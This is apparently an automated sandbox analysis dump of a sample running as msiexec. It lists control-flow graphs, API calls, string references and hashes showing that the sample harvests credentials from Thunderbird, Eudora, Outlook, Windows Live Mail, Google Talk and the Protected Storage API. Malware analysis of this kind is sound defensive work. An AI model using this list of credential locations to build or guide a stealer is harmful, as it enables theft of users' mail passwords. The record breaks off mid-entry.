34010->34011 34012 44b364 ??3@YAXPAX 34011->34012 34013 44b36b 34011->34013 34012->34013 34014 44b374 ??3@YAXPAX 34013->34014 34015 44b37b 34013->34015 34014->34015 34143 426741 21 API calls 34144 40c5c3 123 API calls 34146 43fdc5 17 API calls 34331 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34149 4161cb memcpy memcpy memcpy memcpy 34336 43ffc8 18 API calls 34150 4281cc 15 API calls __fprintf_l 34338 4383cc 110 API calls __fprintf_l 34151 4275d3 41 API calls 34339 4153d3 22 API calls __fprintf_l 34152 444dd7 _XcptFilter 34344 4013de 15 API calls 34346 425115 111 API calls __fprintf_l 34347 43f7db 18 API calls 34350 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34154 4335ee 16 API calls __fprintf_l 34352 429fef 11 API calls 34155 444deb _exit _c_exit 34353 40bbf0 133 API calls 34158 425115 79 API calls __fprintf_l 34357 437ffa 22 API calls 34162 4021ff 14 API calls 34163 43f5fc 149 API calls 34358 40e381 9 API calls 34165 405983 40 API calls 34166 42b186 27 API calls __fprintf_l 34167 427d86 76 API calls 34168 403585 20 API calls 34170 42e58e 18 API calls __fprintf_l 34173 425115 75 API calls __fprintf_l 34175 401592 8 API calls 33213 410b92 33216 410a6b 33213->33216 33215 410bb2 33217 410a77 33216->33217 33218 410a89 GetPrivateProfileIntA 33216->33218 33221 410983 memset _itoa WritePrivateProfileStringA 33217->33221 33218->33215 33220 410a84 33220->33215 33221->33220 34362 434395 16 API calls 34177 441d9c memcmp 34364 43f79b 119 API calls 34178 40c599 42 API calls 34365 426741 87 API calls 34182 4401a6 21 API calls 34184 426da6 memcpy memset memset memcpy 34185 4335a5 15 API calls 34187 4299ab memset memset memcpy memset memset 34188 40b1ab 8 API calls 34370 425115 76 API calls __fprintf_l 34374 4113b2 18 API calls 2 library calls 34378 40a3b8 memset sprintf SendMessageA 33222 410bbc 33225 4109cf 33222->33225 33226 4109dc 33225->33226 33227 410a23 memset GetPrivateProfileStringA 33226->33227 33228 4109ea memset 33226->33228 33233 407646 strlen 33227->33233 33238 4075cd sprintf memcpy 33228->33238 33231 410a0c WritePrivateProfileStringA 33232 410a65 33231->33232 33234 40765a 33233->33234 33236 40765c 33233->33236 33234->33232 33235 4076a3 33235->33232 33236->33235 33239 40737c strtoul 33236->33239 33238->33231 33239->33236 34190 40b5bf memset memset _mbsicmp

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 137 408432-40844e 132->137 138 40842d-408431 132->138 135 408460-408464 134->135 136 408465-408482 134->136 135->136 136->133 136->134 137->130 137->132 138->137
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040832F
                                                                                                            • memset.MSVCRT ref: 00408343
                                                                                                            • memset.MSVCRT ref: 0040835F
                                                                                                            • memset.MSVCRT ref: 00408376
                                                                                                            • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                            • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                            • strlen.MSVCRT ref: 004083E9
                                                                                                            • strlen.MSVCRT ref: 004083F8
                                                                                                            • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                            • String ID: 5$H$O$b$i$}$}
                                                                                                            • API String ID: 1832431107-3760989150
                                                                                                            • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                            • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                            • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                            • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 335 407ef8-407f01 336 407f03-407f22 FindFirstFileA 335->336 337 407f24-407f38 FindNextFileA 335->337 338 407f3f-407f44 336->338 339 407f46-407f74 strlen * 2 337->339 340 407f3a call 407f90 337->340 338->339 341 407f89-407f8f 338->341 342 407f83 339->342 343 407f76-407f81 call 4070e3 339->343 340->338 346 407f86-407f88 342->346 343->346 346->341
                                                                                                            APIs
                                                                                                            • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                            • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                            • strlen.MSVCRT ref: 00407F5C
                                                                                                            • strlen.MSVCRT ref: 00407F64
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFindstrlen$FirstNext
                                                                                                            • String ID: ACD
                                                                                                            • API String ID: 379999529-620537770
                                                                                                            • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                            • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                            • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                            • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00401E8B
                                                                                                            • strlen.MSVCRT ref: 00401EA4
                                                                                                            • strlen.MSVCRT ref: 00401EB2
                                                                                                            • strlen.MSVCRT ref: 00401EF8
                                                                                                            • strlen.MSVCRT ref: 00401F06
                                                                                                            • memset.MSVCRT ref: 00401FB1
                                                                                                            • atoi.MSVCRT(?), ref: 00401FE0
                                                                                                            • memset.MSVCRT ref: 00402003
                                                                                                            • sprintf.MSVCRT ref: 00402030
                                                                                                            • memset.MSVCRT ref: 00402086
                                                                                                            • memset.MSVCRT ref: 0040209B
                                                                                                            • strlen.MSVCRT ref: 004020A1
                                                                                                            • strlen.MSVCRT ref: 004020AF
                                                                                                            • strlen.MSVCRT ref: 004020E2
                                                                                                            • strlen.MSVCRT ref: 004020F0
                                                                                                            • memset.MSVCRT ref: 00402018
                                                                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                              • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                            • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                            • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                            • API String ID: 3833278029-4223776976
                                                                                                            • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                                            • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                            • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                                            • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                              • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                              • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                              • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                            • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                            • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                            • API String ID: 745651260-375988210
                                                                                                            • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                                            • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                            • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                                            • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                            • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                            • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                            • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                            Strings
                                                                                                            • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                            • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                            • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                            • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                            • PStoreCreateInstance, xrefs: 00403C44
                                                                                                            • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                            • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                            • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                            • pstorec.dll, xrefs: 00403C30
                                                                                                            • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                            • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                            • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                            • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                            • API String ID: 1197458902-317895162
                                                                                                            • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                                            • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                            • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                                            • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 238 444c80-444c85 236->238 239 444c9f-444ca3 236->239 246 444d02-444d0d __setusermatherr 237->246 247 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->247 238->234 241 444c8c-444c93 238->241 239->234 242 444ca5-444ca7 239->242 241->234 244 444c95-444c9d 241->244 245 444cad-444cb0 242->245 244->245 245->237 246->247 250 444da4-444da7 247->250 251 444d6a-444d72 247->251 254 444d81-444d85 250->254 255 444da9-444dad 250->255 252 444d74-444d76 251->252 253 444d78-444d7b 251->253 252->251 252->253 253->254 256 444d7d-444d7e 253->256 257 444d87-444d89 254->257 258 444d8b-444d9c GetStartupInfoA 254->258 255->250 256->254 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                            • String ID:
                                                                                                            • API String ID: 3662548030-0
                                                                                                            • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                                            • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                                            • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                                            • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0044430B
                                                                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                              • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                              • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                              • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                            • memset.MSVCRT ref: 00444379
                                                                                                            • memset.MSVCRT ref: 00444394
                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                            • strlen.MSVCRT ref: 004443DB
                                                                                                            • _strcmpi.MSVCRT ref: 00444401
                                                                                                            Strings
                                                                                                            • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                            • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                            • Store Root, xrefs: 004443A5
                                                                                                            • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                            • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                            • API String ID: 3203569119-2578778931
                                                                                                            • Opcode ID: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                                            • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                            • Opcode Fuzzy Hash: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                                            • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 2054149589-0
                                                                                                            • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                                            • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                            • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                                            • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 321 40ba74 314->321 322 40ba6f-40ba72 314->322 315->308 315->309 316 40baa0-40bab3 call 407e30 323 40bab5-40bac1 316->323 324 40bafa-40bb09 SetCursor 316->324 325 40ba75-40ba76 call 40b5e5 321->325 322->325 326 40bac3-40bace 323->326 327 40bad8-40baf7 qsort 323->327 325->315 326->327 327->324 331->316 332->316 333->316 334->316
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Cursor_mbsicmpqsort
                                                                                                            • String ID: /nosort$/sort
                                                                                                            • API String ID: 882979914-1578091866
                                                                                                            • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                            • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                            • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                            • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 004109F7
                                                                                                              • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                              • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                            • memset.MSVCRT ref: 00410A32
                                                                                                            • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 3143880245-0
                                                                                                            • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                            • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                            • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                            • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 358 44b33b-44b342 359 44b344-44b34a ??3@YAXPAX@Z 358->359 360 44b34b-44b352 358->360 359->360 361 44b354-44b35a ??3@YAXPAX@Z 360->361 362 44b35b-44b362 360->362 361->362 363 44b364-44b36a ??3@YAXPAX@Z 362->363 364 44b36b-44b372 362->364 363->364 365 44b374-44b37a ??3@YAXPAX@Z 364->365 366 44b37b 364->366 365->366
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??3@
                                                                                                            • String ID:
                                                                                                            • API String ID: 613200358-0
                                                                                                            • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                            • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                            • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                            • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 367 410dbb-410dd2 call 410d0e 370 410dd4-410ddd call 4070ae 367->370 371 410dfd-410e1b memset 367->371 380 410ddf-410de2 370->380 381 410dee-410df1 370->381 372 410e27-410e35 371->372 373 410e1d-410e20 371->373 376 410e45-410e4f call 410a9c 372->376 373->372 375 410e22-410e25 373->375 375->372 378 410e37-410e40 375->378 384 410e51-410e76 call 410d3d call 410add 376->384 385 410e7f-410e92 _mbscpy 376->385 378->376 380->371 383 410de4-410de7 380->383 387 410df8 381->387 383->371 386 410de9-410dec 383->386 384->385 388 410e95-410e97 385->388 386->371 386->381 387->388
                                                                                                            APIs
                                                                                                              • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                                              • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                            • memset.MSVCRT ref: 00410E10
                                                                                                            • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                              • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                            Strings
                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                            • API String ID: 119022999-2036018995
                                                                                                            • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                                            • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                            • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                                            • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 393 4085d2-408605 call 44b090 call 4082cd call 410a9c 400 4086d8-4086dd 393->400 401 40860b-40863d memset call 410b62 393->401 404 4086c7-4086cc 401->404 405 408642-40865a call 410a9c 404->405 406 4086d2 404->406 409 4086b1-4086c2 call 410b62 405->409 410 40865c-4086ab memset call 410add call 40848b 405->410 406->400 409->404 410->409
                                                                                                            APIs
                                                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                              • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                              • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                            • memset.MSVCRT ref: 00408620
                                                                                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                            • memset.MSVCRT ref: 00408671
                                                                                                            Strings
                                                                                                            • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                                                                            • String ID: Software\Google\Google Talk\Accounts
                                                                                                            • API String ID: 3996936265-1079885057
                                                                                                            • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                                            • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
